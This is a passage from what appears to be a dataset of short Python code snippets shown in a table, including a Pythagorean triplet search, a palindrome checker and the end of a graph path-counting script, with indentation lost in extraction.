if node.islower() and not mod_twice:
V.remove(node)
dfs('start', set(), False)
print(count)
print("--- %s seconds ---" % (time.time() - start_time)) |
995,098 | aa4666488a326517d02c4f8b4a6aa647b55afba6 | for a in range(1,999):
for b in range(1,1000-a):
c=1000-a-b
if a*a+b*b==c*c: print a*b*c
|
995,099 | e0162ee53d82aadb71b59bc4f7fe45159f9221a4 | from copy import *
class Solution:
def isPalindrome(self, s: str) -> bool:
if s=="":
return True
if not s:
return False
l=[p for p in s.lower() if p.isalnum()]
print(l)
l.reverse()
if l==l[::-1]:
return True
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.